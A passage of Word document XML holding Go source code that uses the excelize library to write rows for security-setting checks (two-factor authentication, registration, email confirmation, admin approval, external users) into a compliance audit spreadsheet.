          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>错误</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:%s", err))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5782438F" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B669DE4" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC3FE9B" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C0B64C9" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>双因素认证</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C26631C" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>row++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B51F2F" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>two_factor_auth_name, err := excelize.JoinCellName("A", row)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7A2B24" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>two_factor_auth := []interface{}{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD5A81F" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.TwoFactorAuth.CheckRule,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9F6EE7" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656E4BE3" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.TwoFactorAuth.Result,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5362379A" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FBFD9C" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533D54BD" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.TwoFactorAuth.Description,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E8B54B" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.TwoFactorAuth.Advice,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647FE7E5" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F01A87" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>err = f.SetSheetRow(sheetName_SettingsAndUser, two_factor_auth_name, &amp;two_factor_auth)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B367AD2" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64129298" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fmt.Println(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378EB5EC" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E5FD5E" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A35E8CD" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>禁用注册功能</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7130B871" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>row++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7520BB30" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>register_enable_name, err := excelize.JoinCellName("A", row)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BA0F43" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>register_enable := []interface{}{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E82355" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Register.RegisterEnable.CheckRule,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA02AE0" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A99B9A7" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Register.RegisterEnable.Result,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5674132F" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Register.RegisterEnable.Keyword,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E10D1E8" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Register.RegisterEnable.Complaince,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26519756" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Register.RegisterEnable.Description,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232780DB" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Register.RegisterEnable.Advice,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D871764" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02993C43" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>err = f.SetSheetRow(sheetName_SettingsAndUser, register_enable_name, &amp;register_enable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA97D27" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40331E75" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fmt.Println(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04243E75" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7CBAB5" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3513B867" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注册</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启用邮箱验证</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50960AA1" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>row++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272299B5" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>register_merge_start := "A" + strconv.Itoa(row)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756F78B6" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>email_confirmation_name, err := excelize.JoinCellName("A", row)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5076D4A7" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>email_confirmation := []interface{}{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C8F24A" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Register.EmailConfirmation.CheckRule,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D04091B" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Register.EmailConfirmation.CheckRule,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDE0CFB" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Register.EmailConfirmation.Result,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A4A730" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Register.EmailConfirmation.Keyword,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AECA83" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Register.EmailConfirmation.Complaince,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069BB0A0" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Register.EmailConfirmation.Description,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD3A3F9" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Register.EmailConfirmation.Advice,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B465A9E" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350F41D1" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>err = f.SetSheetRow(sheetName_SettingsAndUser, email_confirmation_name, &amp;email_confirmation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255CCBFD" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740A7350" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fmt.Println(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF6AC10" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4533C026" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D5F3F94" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注册</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新用户注册后需等待</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>批准</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A16FF6E" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>row++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F522A1A" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>admin_approval_name, err := excelize.JoinCellName("A", row)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E260D1F" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>admin_approval := []interface{}{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D24AC2" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528ACEEA" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Register.AdminApproval.CheckRule,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3230CA10" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Register.AdminApproval.Result,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C4A69A" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Register.AdminApproval.Keyword,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57380CCE" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Register.AdminApproval.Complaince,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5010C8" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Register.AdminApproval.Description,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A0893F" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Register.AdminApproval.Advice,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BDFF65" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFB806F" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>err = f.SetSheetRow(sheetName_SettingsAndUser, admin_approval_name, &amp;admin_approval)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417B0BC0" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287E8E1B" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fmt.Println(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1E74FB" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7A8C7D" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="016C5FF2" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注册</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注册区分外部、内部用户</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A973CC" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>row++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CC2B62" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>external_name, err := excelize.JoinCellName("A", row)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A91E79" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>external := []interface{}{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A02F9EC" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3AB737" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Register.External.CheckRule,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9382B6" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Register.External.Result,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780A4FC3" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Register.External.Keyword,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA2EF44" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Register.External.Complaince,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC1CE43" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Register.External.Description,</w:t>
      </w:r>
    </w:p>
